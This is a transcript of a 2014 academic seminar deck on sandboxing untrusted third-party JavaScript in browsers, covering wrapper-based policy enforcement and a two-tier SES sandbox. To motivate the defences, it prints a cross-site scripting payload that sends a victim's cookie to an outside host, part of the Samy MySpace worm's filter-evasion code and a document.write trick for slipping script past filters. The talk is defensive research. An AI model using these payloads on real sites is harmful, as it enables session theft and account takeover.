web security: securing untrusted web content at browsers
DESCRIPTION
Seminar on April 28, 2014, Danang University of Technology, Danang City, Vietnam.TRANSCRIPT
![Page 1: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/1.jpg)
WEB SECURITY: SECURING UNTRUSTED WEB CONTENT AT BROWSERSPhu H. Phung
University of Gothenburg, Sweden, and
University of Illinois at Chicago, USA
April 28 2014 – Danang University of Science and Technology, Vietnam
![Page 2: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/2.jpg)
2
Web page is rendered at browsers
• Web pages contain JavaScript code, a scripting language run at browsers
• JavaScript can provide a lot of functionalities rich interactions
![Page 3: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/3.jpg)
92% of all websites use JavaScript[w3techs.com]
“88.45% of the Alexa top 10,000 web sites included at least one
remote JavaScript library”CCS’12
3
![Page 4: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/4.jpg)
4
Third-party JavaScript is everywhere• Advertisements
• Adhese ad network
• Social web• Facebook Connect• Google+• Twitter• Feedsburner
• Tracking• Scorecardresearch
• Web Analytics• Yahoo! Web Analytics• Google Analytics
• …
![Page 5: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/5.jpg)
Two basic composition techniques• Iframe integration
5
<html><body>…<iframe src=“http://3rdparty.com/frame.html”></iframe>…</body></html>
3rd party
![Page 6: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/6.jpg)
6
Two basic composition techniques
<html><body>…<script src=“http://3rdparty.com/script.js”></script>…</body></html>
3rd party
Script inclusion
![Page 7: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/7.jpg)
Third-party JavaScript issues
• Third-party script inclusion run with the same privilege of the hosting page.
• Security issues:• Malicious third-party code• Trusted third-party is compromised • Confidentiality, integrity, and other security risks
7
![Page 8: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/8.jpg)
8
Difficult issues with JavaScript
• JavaScript is a powerful language, but the language design is bad for security, e.g.:• Dynamic scripts: document.write, eval, ...• Encapsulation leakage• ...
<script> document.write(‘<scr’);document.write(‘ipt> malic’);var i= 1;document.write(‘ious code; </sc’);document.write(‘ript>’);</script>
<script> malicious code; </script>
A lot of attacks were launched in
practice
![Page 9: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/9.jpg)
9
Samy attack on Myspace• MySpace tries to filter out JavaScript code in user data
• BUT: The malicious code was injected in a “strange” way that escapes the filter<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);………">
</div>
![Page 10: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/10.jpg)
10
A cross-site scripting attack example
<script>alert(document.location='http://ha.ckers.org/?cookie='+document.cookie);</script>
Step 1 – Inject malicious code to a vulnerable web site Step 2 – Trick victims to the linkStep 3 – Get the cookie and launch attack
![Page 11: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/11.jpg)
11
A real attack with stolen cookies
• Firesheep, an add-on for Firefox• Steal cookies, and then
compromise the account of e.g. Facebook users
October 2010
![Page 12: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/12.jpg)
Another attack
• Million Browser Botnet
(July 2013)• Leverage Advertising
Networks using JavaScript to launch Application-Level DDoS
• Paid on 2 ad networks for displaying treacherous advertisements on pages visited by hundreds of thousands of people
(Malicious code run automatically without user knowledge)
Jeremiah Grossman & Matt JohansenWhiteHat SECURITY
12
![Page 13: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/13.jpg)
13
State-of-the-art
• Limit third-party code to safe subset of JavaScript• Facebook JS, ADSafe, ADSafety, ...
• Browser-based sandboxing solutions• ConScript, WebJail, Contego, ...
• Server-side transformations of scripts to be included• Google Caja, BrowserShield, ...
No compatibility with existing scripts
Browser modifications imply short-term deployment issues
No direct script delivery to browserGreat runtime overhead
![Page 14: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/14.jpg)
Our approach
•A sandbox model for third-party JavaScript• Using only JS libraries and wrappers• No browser modification is required • The third-party code is keep in original• Easily dealing with dynamic features of JavaScript
14
![Page 15: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/15.jpg)
15
API call interception
alert implementation
JavaScript execution environment(e.g. browsers)
Native implementations
code pointers User functions
alert(‘Hi!’) window.alert
alert wrapper(+policy code)
Attacker codealert = function(){...};
alert wrapper
unique
(enforced by SPJS)
![Page 16: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/16.jpg)
16
Deployment illustration<html> <head> <script src=“selfprotectingJS.js"></script> <title>Self-protecting JavaScript </title> <meta content=…> <style>…</style> <script>…</script> <!-- more heading setting --> </head> <body> <script type="text/javascript"> (function() {..})(); </script> <!-- the content of page --> </body></html>
Policy code and
enforcement code defined in a text file
The enforcement code can be
deployed anywhere: server side, proxy or browser plug-in, i.e.
no need for a modified browser
The orgininal code is not
syntactically modified
6.33
66.03
0
10
20
30
40
50
60
70
Self-Protecting BrowserShield
Slo
wd
ow
n (t
imes
)
Runtime overhead
![Page 17: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/17.jpg)
17
Effectiveness• Defend almost all of the known XSS attacker vectors
• 34 attack vectors over 38 successful attack vectors
• Provide Security Policy Patterns to build realistic policies e.g. prevent the attack of Firesheep on Facebook
• Defend real-world exploits• phpBB 2.0.18 vulnerabilities – a stored XSS attack• WebCal vulnerabilities –a reflected XSS attack
![Page 18: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/18.jpg)
Our contributions in web security
Lightweight Self-Protecting JavaScript
ASIACCS’09
A Two-tier Sandbox Architecture for Untrusted
JavaScript
JSTools’12Safe Wrappers and Sane Policies for
Self-Protecting JavaScriptAppSec Research ’10
JSand: complete client-side sandboxing of third-party
JavaScript without browser modifications
ACSAC’11SAFESCRIPT: JavaScript Transformation for Policy Enforcement
Nordsec ’13
![Page 19: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/19.jpg)
A Two-tier Sandbox Architecture for Untrusted JavaScript• Based on the two published papers:
• PH Phung, L Desmet. A two-tier sandbox architecture for untrusted JavaScript, invited paper at JSTools’12
• P Agten, S Van Acker, Y Brondsema, PH Phung, L Desmet, F Piessens. JSand: complete client-side sandboxing of third-party JavaScript without browser modifications, ACSAC’12
19
![Page 20: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/20.jpg)
20
SPJS with Untrusted JavaScript
Self-Protecting JavaScript Code TRUSTED
UNTRUSTED
• No privilege distinguish between hosting code and external code
Hosting code
Hosting code
Hosting code
external code
external code
![Page 21: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/21.jpg)
21
Goals• Deploy SPJS in the context of untrusted JS
• Load and execute untrusted code without pre-processing the code• No browser modification is required
• Enforce modular and fined-grained, stateful security policies for a piece of untrusted code• Protect the hosting page from untrusted code
• Robust to potential flaws in security policies• Bad written policies might not break security
![Page 22: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/22.jpg)
22
Two-tier sandbox architecture
var api = loadAPI(…);
var outerSandbox = cajaVM.compileModule(policyCode);
var enforcedAPI = outerSandbox(api);
var innerSandbox = cajaVM.compileModule(untrustedCode);
innerSandbox(enforcedAPI);
![Page 23: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/23.jpg)
Two-tier Sandbox Architecture
23
Sandbox running
untrusted code, defined in a
separate file e.g. `untrusted.js’
Sandbox running policy code, defined in a separate JS e.g. `policy.js’
Base-line API implementation,in e.g. `api.js’ file
JavaScript environment,
e.g. the DOM
The policy code can only access the base-line API and provided
wrapper functions (ensuring no leaks to global)
The untrusted code can only access objects returned by the outer sandbox
![Page 24: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/24.jpg)
24
The architecture in multiple-principal untrusted code
Policy 2Policy 1
untrusted
Policy 3
untrusted
untrusted
Base-line API implementation,in e.g. `api.js’ file
![Page 25: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/25.jpg)
25
Sandboxing untrusted code
• Use Secure ECMAScript (SES) library developed by Google Caja team• Load a piece of code to execute within an isolated
environment• The code can only interact with the outside world via provided
APIs
var api = {...}; //constructingvar makeSandbox = cajaVM.compileModule(untrustedCodeSrc);var sandboxed = makeSandbox(api);
![Page 26: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/26.jpg)
Isolation technique: The SES library
Object-capability environment• Scripts can access
• Objects they create themselves• Objects explicitly handed to them
APIGlobal context
untrustedCodesandbox
26
![Page 27: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/27.jpg)
Isolation technique: The SES library
27
![Page 28: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/28.jpg)
Base-line APIs implementation
• Create a Virtual DOM• Intercepting wrapper around real DOM• Consult security policy on each operation• Use Harmony Proxies to generically intercept property accesses on objects
• Virtual DOM implementation uses the Membrane Pattern• Wrap any object passed from DOM to sandbox (return
values)• Unwrap any object passed from sandbox to DOM
(arguments)
28
![Page 29: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/29.jpg)
Wrapper example
29
![Page 30: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/30.jpg)
30
Policy definition
• Base-line APIs implementation• Can enforce coarse-grained, generic policies, e.g.:
• Sanitize HTML• Ensure complete mediation
• Fine-grained policies for multiple untrusted JavaScript code• Modular, principal-specific, e.g.: script1 is allowed to
read/write reg_A, script2 is allowed to read reg_A • Stafeful, e.g.: limit the number of popups to 3 • Cross-principal stateful policies, e.g: after script1 write
to reg_A, disallow access from script2 to reg_A
![Page 31: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/31.jpg)
Deployment model
• Untrusted code is loaded into a string variable• Using server-side proxy + XMLHttpRequest (to
overcome same origin policy)• CORS/UMP headers set by the script provider
<script src=“http://3rdparty.com/script.js”></script>
<script src=“ses.js”></script><script src=“api.js”></script><script src=“policy0.js”></script><script>var script = get(“http://3rdparty.com/script.js”);ses.execute(script,policy0);</script>before
after
31
![Page 32: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/32.jpg)
32
Secure dynamic script evaluation
• Special handlers to intercept all methods that allow script tags to be added• node.appendChild, node.insertBefore,
node.replaceChild, node.insertAfter• document.write, …• Event handlers in HTML, e.g. <…onclick=“javascript:xyz(…)”>
1. Parse partial DOM tree/HTML
2. Execute scripts in the sandbox environment
![Page 33: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/33.jpg)
Different parsing techniques• Via a sandboxed iframe
1. Create sandbox iframe
2. Set content via srcdoc attribute• More performant• Parsed exactly as will be interpreted by browser• Executed asynchronously
• (Alternative) Via a HTML parsing library in JavaScript
33
![Page 34: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/34.jpg)
34
Loading additional code in the sandbox
• Several use cases require external code to be executed in a previously set up sandbox• Loading API + glue code• Dynamic script loading
• Two new operations:• innerEval(code)• innerLoadScript(url)
![Page 35: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/35.jpg)
Case studies• Single principal code
• Multiple-principal code• Context-aware ads
35
![Page 36: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/36.jpg)
36
Introduction to our research
![Page 37: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/37.jpg)
37
![Page 38: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/38.jpg)
Past projects
• SESAME: Security for Extensible Software Architectures in Mobile Environments, collaborated with Volvo Technology.
• European WebSand project (3 years, 5 EU universities and industries)
![Page 39: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/39.jpg)
39
A real attack example
http://www.wired.com/threatlevel/2010/03/hacker-bricks-cars/
![Page 40: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/40.jpg)
40
The future in-vehicle system
![Page 41: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/41.jpg)
41
Motivations for fined-grained policy enforcement at runtime• Third-party service needs to
use sensitive resources, e.g. GPS location,SMS sending to function
• Potential security risks: e.g. leaking GPS info, send too many SMS messages causing high costNeed for fined-grained security policy enforcement at runtime
Policy: allow SMS sending but restricted to a specific recipient address, limit on the number of messages sent per
day, depending on the vehicle's location
![Page 42: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/42.jpg)
42
Our contributions to vehicle application security
Security Policy Enforcement for the OSGi Framework using Aspect-Oriented
ProgrammingCOMPSAC’08
A Model for Safe and Secure Execution of Downloaded
Vehicle ApplicationsRTIC’10
![Page 43: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/43.jpg)
Ongoing work
• interWebSec: Cross-Language Web Protection, funded by Swedish Research Council (3 years, on-going)
• A general platform for Bot-as-a-Service in Smart Cities (with Vienna Univ. Tech.)
43
![Page 44: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/44.jpg)
Research group in Sweden• Well-known for web and language-based security • 3 faculties, 3 postdocs, ~8 PhD students
• http://vimeo.com/82206652
44
![Page 45: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/45.jpg)
Research group in USA
• One faculty, 3 postdocs, 6 PhD students• Well-known for computer systems security with the use of ideas from compilers, operating systems and formal methods
• Publications in CCS, Oakland, USENIX Security• Ongoing projects
• Secure Web Advertisements, funded by NSF (3 years with UIC & UT Dallas, on-going)
• Defensive Optimizing Compiler, funded by DARPA (3 years with UIC, UCLA & Bell Labs, on-going)
45
![Page 47: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/47.jpg)
47
![Page 48: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/48.jpg)
Implementation challenges
•Legacy scripts need additional pre-processing to be compatible with the framework• Secure ECMAScript restrictions
• A subset of ECMAScritp strict mode• Global variables aliased as window properties
• No ‘this’ auto coercion
48
![Page 49: Web security: Securing untrusted web content at browsers](https://reader036.vdocument.in/reader036/viewer/2022082700/5491cc37b47959640d8b5680/html5/thumbnails/49.jpg)
49
JS transformation examples